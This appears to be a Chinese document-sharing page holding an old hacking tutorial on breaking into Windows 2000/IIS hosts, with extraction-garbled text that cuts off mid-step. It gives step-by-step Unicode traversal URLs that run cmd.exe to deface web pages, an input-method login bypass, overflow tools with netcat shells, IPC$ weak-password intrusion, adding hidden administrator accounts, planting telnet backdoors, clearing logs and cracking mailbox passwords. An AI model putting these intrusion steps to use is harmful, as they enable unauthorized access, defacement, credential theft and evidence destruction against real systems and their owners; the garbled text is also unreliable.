知道对方IP如何攻击入侵Word下载.docx

上传人:b****5 文档编号:21475191 上传时间:2023-01-30 格式:DOCX 页数:13 大小:22.84KB
下载 相关 举报
知道对方IP如何攻击入侵Word下载.docx_第1页
第1页 / 共13页
知道对方IP如何攻击入侵Word下载.docx_第2页
第2页 / 共13页
知道对方IP如何攻击入侵Word下载.docx_第3页
第3页 / 共13页
知道对方IP如何攻击入侵Word下载.docx_第4页
第4页 / 共13页
知道对方IP如何攻击入侵Word下载.docx_第5页
第5页 / 共13页
点击查看更多>>
下载资源
资源描述

知道对方IP如何攻击入侵Word下载.docx

《知道对方IP如何攻击入侵Word下载.docx》由会员分享,可在线阅读,更多相关《知道对方IP如何攻击入侵Word下载.docx(13页珍藏版)》请在冰豆网上搜索。

知道对方IP如何攻击入侵Word下载.docx

22p<

ProgramFiles

2002-01-2306:

21p<

WINNT

4File(s)1,156bytes

5Dir(s)2,461,421,568bytesfree

------------------------------

的目录列表。

也会碰到看不到文件的空目录。

好,我们成功看到了机器里的C盘了。

我们在浏览器里输入:

192.168.0.111/scripts/..%c0%af../winnt/system32/cmd.exe?

/c+set回车

CGIError

ThespecifiedCGIapplicationmisbehavedbynotreturningacompletesetofHTTPheaders.Theheadersitdidreturnare:

ALLUSERSPROFILE=C:

\DocumentsandSettings\AllUsers

CommonProgramFiles=C:

\ProgramFiles\CommonFiles

COMPUTERNAME=ON

ComSpec=C:

\WINNT\system32\cmd.exe

CONTENT_LENGTH=0

GATEWAY_INTERFACE=CGI/1.1

HTTP_ACCEPT=image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*

HTTP_ACCEPT_LANGUAGE=zh-cn

HTTP_CONNECTION=Keep-Alive

HTTP_HOST=192.168.0.111

HTTP_USER_AGENT=Mozilla/4.0(compatible;

MSIE6.0b;

Windows98;

Win9x4.90)

HTTP_ACCEPT_ENCODING=gzip,deflate

HTTPS=off

INSTANCE_ID=1

LOCAL_ADDR=192.168.0.111

NUMBER_OF_PROCESSORS=1

Os2LibPath=C:

\WINNT\system32\os2\dll;

OS=Windows_NT

Path=C:

\WINNT\system32;

C:

\WINNT;

\WINNT\System32\Wbem;

\MSSQL7\BINN

PATH_TRANSLATED=c:

\inetpub\wwwroot

PATHEXT=.COM;

.EXE;

.BAT;

.CMD;

.VBS;

.VBE;

.JS;

.JSE;

.WSF;

.WSH

PROCESSOR_ARCHITECTURE=x86

PROCESSOR_IDENTIFIER=x86Fa

-----------------

哈,我们看到了机器设置内容了,我们找找,主要看PATH_TRANSLATED=c:

意思是他的主页存放在c:

\inetpub\wwwroot的目录里,知道就好办了。

我们用命令:

\inetpub\wwwroot回车

我们就可以看到c:

\inetpub\wwwroot目录里的文件了,一般都有default.asp,default.htm,index.htm,index.asp,等等。

我们以目录里有index.asp做例子。

我们先要做的是把文件的只读属性解除掉,很多管理员都把文件设置只读。

192.168.0.111/scripts/..%c0%af../winnt/system32/attrib.exe?

%20-r%20-h%20c:

\inetpub\wwwroot\index.asp回车

当看到下面的英文

ThespecifiedCGIapplicationmisbehavedbynotreturningacomplete

setofHTTPheaders.Theheadersitdidreturnare:

恭喜你,你可以改他的网页了。

----------------------------------------

但如果你看到下面的英文就不成功,只好换其他机器了。

Accessdenied-C:

\inetpub\wwwroot\index.asp

-----------------------------

继续。

现在用ECHO改网页的内容。

100.100.100.111/scripts/..%c0%af../winnt/system32/cmd"

.exe?

/c+echo+网站有漏洞+>

c:

当看到

的提示,你已经改了他的网页了,呵呵,你想改成什么字也行。

只要把命令中的中文换成你自己的中文就行了。

英文WIN2000

/scripts/..%c0%af../winnt/system32/cmd.exe?

中文WIN2000

/scripts/..%c0%2f../winnt/system32/cmd.exe

/scripts/..%c1%1c../winnt/system32/cmd.exe

WINNT4

/scripts/..%c1%9c../winnt/system32/cmd.exe

通用代码:

/scripts/..%255c../winnt/system32/cmd.exe?

(2)Windows2000输入法漏洞

先用端口扫描器扫描开放3389的机器,然后用终端客户端程序进行连接,用CTRL+SHIFT快速切换输入法,切换至全拼,这时在登录界面左下角将出现输入法状态条,在输入法状态条上按鼠标右键。

选择“帮助”——“输入法指南”——“选项”。

(如果发现“帮助”呈灰色,放弃,因为对方很可能发现并已经补上了这个漏洞。

)按右键,选择“跳转到URL”,输入:

c:

\winnt\system32在该目录下找到“net.exe”,为“net.exe”创建一个快捷方式,右键点击该快捷方式,在“属性”—“目标”—c:

\winnt\system32\net.exe后面空一格,填入“userguest/active:

yes”。

点击“确定”(目的是,利用“net.exe”激活被禁止使用的guest账户)运行该快捷方式。

(此时你不会看到运行状态,但guest用户已被激活。

)然后重复操作上面的,在“属性”——“目标”——c:

\winnt\system32\net.exe后面空一格,填入localgroupadministratorsguest/add(这一步骤目的是,利用“net.exe”将guest变成系统管理员。

)再次登录终端服务器,以“guest”身份进入,此时guest已是系统管理员,已具备一切可执行权及一切操作权限。

现在,我们可以像操作本地主机一样,控制对方系统。

(3)idq溢出漏洞

要用到3个程序,一个SnakeIISIDQ溢出程序GUI版本,一个扫描器,还有NC。

首先扫描一台有IDQ漏洞的机器,然后设置SnakeIISIDQ溢出程序,在被攻击IP地址后面写上对方的IP.端口号一般不需要改动,软件的默认绑定CMD.EXE的端口是813.不改了.用默认的,左面选择操作系统类型,随便选一个,我们选IIS5EnglishWin2kSp0吧,点击IDQ溢出~~OK~~出现发送Shellcode成功的提示了,然后我们用NC来连接。

进入MS-DOS。

进入“nc”的目录。

然后:

nc--vIP813

\>

nc-vvIP813

IP:

inversehostlookupfailed:

h_errno11004:

NO_DATA

(UNKNOWN)[IP]813(?

):

connectionrefused

sent0,rcvd0:

NOTSOCK

看来没成功.别灰心,在来一次,换用IIS5EnglishWin2kSp1试试。

)open

MicrosoftWindows2000[Version5.00.2195]

(C)Copyright1985-2000MicrosoftCorp.

\WINNT\system32>

哈哈,终于上来啦,你现在可是system权限,下面该怎么做就看你的啦。

(4)IDA溢出漏洞

所用程序:

idahack

进入MS-DOS方式(假设idq.exe在c:

\下)

\idahack.exe

运行参数:

\idahack<

host>

<

hostport>

hosttype>

shellport>

chinesewin2k:

1

chinesewin2ksp1:

2

chinesewin2ksp2:

3

englishwin2k:

4

englishwin2ksp1:

5

englishwin2ksp2:

6

japanesewin2k:

7

japanesewin2ksp1:

8

japanesewin2ksp2:

9

koreawin2k:

10

koreawin2ksp1:

11

koreawin2ksp2:

12

chinesentsp5:

13

chinesentsp6:

14

\idahack127.0.0.180180

connecting...

sending...

Nowyoucantelnetto80port

好luck

好,现在你可以telnet它的80端口了,我们用NC来连接。

\nc127.0.0.180

(C)版权所有1985-1998MicrosoftCorp

OK,现在我们现在上来了,也可IDQ一样是SYSTEN权限,尽情的玩吧。

(5).printer漏洞

这个漏洞,我们用两个程序来入侵。

iis5hack和nc。

iis5hack

iis5remote.printeroverflow.writenbysunx

http:

//www.sunx.org

fortestonly,dontusedtohack,:

p

usage:

D:

\IIS5HACK.EXE<

Host>

HostPort>

HostType>

ShellPort>

用法:

\IIS5HACK<

溢出的主机>

主机的端口>

主机的类型>

溢出的端口>

chineseedition:

0

chineseedition,sp1:

englishedition:

englishedition,sp1:

japaneseedition:

japaneseedition,sp1:

koreaedition:

koreaedition,sp1:

mexicoedition:

mexicoedition,sp1:

iis5hack127.0.0.19801119

Listn:

80

Nowyoucantelnetto3739port

好luck

溢出成功!

nc127.0.0.19119

(C)版权所有1985-2000MicrosoftCorp.

OK,我们又成功取得system权限!

玩吧。

(6)139端口入侵

我们先确定一台存在139端口漏洞的主机。

用扫描工具扫描!

比如SUPERSCAN这个端口扫描工具。

假设现在我们已经得到一台存在139端口漏洞的主机,我们要使用nbtstat-aIP这个命令得到用户的情况!

现在我们要做的是与对方计算机进行共享资源的连接。

用到两个NET命令,下面就是这两个命令的使用方法

NETVIEW?

作用:

显示域列表、计算机列表或指定计算机的共享资源列表。

?

命令格式:

netview[\\computername|/domain[:

domainname]]?

参数介绍:

<

1>

键入不带参数的netview显示当前域的计算机列表。

2>

\\computername指定要查看其共享资源的计算机。

3>

/domain[:

domainname]指定要查看其可用计算机的域?

NETUSE?

作用:

连接计算机或断开计算机与共享资源的连接,或显示计算机的连接信息。

netuse[devicename|*][\\computername\sharename[\volume]]?

[password|*]][/user:

[domainname\]username][[/delete]|?

[/persistent:

{yes|no}]]?

键入不带参数的netuse列出网络连接。

devicename指定要连接到的资源名称或要断开的设备名称。

\\computername\sharename服务器及共享资源的名称。

password访问共享资源的密码。

*提示键入密码。

/user指定进行连接的另外一个用户。

domainname指定另一个域。

username指定登录的用户名。

/home将用户连接到其宿主目录?

/delete取消指定网络连接。

/persistent控制永久网络连接的使用。

\netuse\\IP

\netview\\IP

我们已经看到对方共享了他的C,D,E三个盘

我们要做的是使用NBTSTAT命令载入NBT快取.

nbtstat–R载入NBT快取

nbtstat–c看有无载入NBT快取

现在我们已经得到的139端口漏洞的主机IP地址和用户名,现在就该是我们进入他计算的时候了,点击开始---查找--计算机,将刚才找到的主机名字输入到上面,选择查找,就可以找到这台电脑了!

双击就可以进入,其使用的方法和网上领居的一样。

(7)IPC入侵

所有程序:

流光

开始:

在主界面选择探测→探测POP3/FTP/NT/SQL主机选项,或者直接按Ctrl+R。

输入我们要破解的IP段,我们把“将FrontPage主机自动加入HTTP主机列表取消了”。

因为我们只想获得IPC弱口令,这样可以加快扫描的速度:

)填入IP,选择扫描NT/98主机。

在“辅助主机”那里的“IPC$主机”前面打勾,然后在菜单了选“探测”,,扫描出结果以后,“IPC$主机”,选中后按“CTRL+F9”就开始探测IPC用户列表。

会出现“IPC自动探测”

的窗体,把那两个选项都选了,然后点“选项”为了加快弱口令扫描速度,这里的两个选项我们可以全部取消记住。

然后点“确定”出来后点“是”就开始探测了。

一会儿,结果出来了。

比如我们探测出了用户名为“admin”的管理员,密码为“admin”,现在我们用命令提示符,熟悉下命令吧,输入:

netusefile:

//对方ip/ipc$"

密码"

/user:

"

用户名"

||建立远程连接

copyicmd.exefile:

//对方ip/admin$||admin$是对方的winnt目录

nettimefile:

//对方IP/||看看对方的本地时间

atfile:

//对方ip/启动程序的时间启动程序名启动程序的参数||用at命令来定时启动程序

telnet对方ip端口

我们也可以改网页:

netuse\\ip\ipc$"

admin"

/uesr:

回车。

出现“命令成功完成”。

然后输入“dir\\ip\c$\*.*”

看到C:

下所有内容。

现在我们来改主页。

一般主页放在c:

\inetpub\wwwroot里面

输入“dir\\ip\c$\inetpub\wwwroot\*.*”。

就可以看到index.htm或index.asp或default.htm或default.asp.这些就是主页了,假如你黑页在C:

下,就输入"

copy主页文件\\ip\c$\inetpub\wwwroot"

覆盖原文件这样就行了,简单吧?

日志清除,断开连接:

我们copycl.exe,clear.exe上去,再执行,就可以清除日志,比如clearall:

清除所有的日志。

然后在断开连接:

//ip/ipc$/delete

(8)超管SA空密码漏洞

使用的工具:

流光IV

启动流光,按Ctrl+R。

出现扫描设置对话框,设置扫描IP段,并且选择扫描的类型为SQL。

点击“确定”,进行扫描,假设我们取得主机:

127.0.0.1,然后点击“工具”——SQL远程命令(或者Ctrl+Q),填入主机IP(127.0.0.1)、用户(sa)、密码(空)点击“连接”,出现远程命令行的界面。

netuserheiyingheiying1/add填加一个heiying的帐号和密码heiying1

netlocalgroupadministratorsheiying/add将我们创建的heiying帐号填加到管理组。

下面我们来做跳板:

打开cmd.exe,输入netuse\\127.0.0.1\ipc$"

heiying1"

heiying"

命令

显示命令成功完成。

上传srv.exe:

copysrv.exe\\127.0.0.1\admin$\system32

上传ntlm.exe:

copyntlm.exe\\127.0.0.1\admin$\system32

启动服务:

首先用nettime\\127.0.0.1

看看对方主机的时间,(假如回显\\127.0.0.1的本地时间是上午12.00),然后我们用at\\2127.0.0.112.01srv.exe命令来启动srv.exe。

等一分钟后就可以telnet了。

一分钟后在本机命令提示符中输入:

telnetX.X.X.X99

然后我们要启动NTLM.exe:

在telnet状态下直接输入ntlm回车。

显示:

windows2000telnetdump,byassassin,allrightsreserved.done!

然后从新启动对方主机的telnet服务:

netstoptelnet(先关闭telnet服务)再输入netstarttelnet(启动telnet服务)然后我们退出telnet,然后在命令行下输入telnet127.0.0.1,依照提示,接着输入用户名:

heiying,密码:

heiying1,回车。

这样,我们的跳板就做好了,简单吧?

(上面上传的srv和ntlm等东东还有一个简便方法,全都可以直接用流光工具菜单里的种植者上传,60秒后自动运行,不用敲命令!

呵呵~~~~方便吧!

(9)如何用流光破解信箱密码

这次的目标是21CN,运行流光IV,选择POP3主机----右键----编辑----添加,填上:

,其他的就用默认吧!

不用更改,确定

展开阅读全文
相关资源
猜你喜欢
相关搜索

当前位置:首页 > 外语学习 > 英语考试

copyright@ 2008-2022 冰豆网网站版权所有

经营许可证编号:鄂ICP备2022015515号-1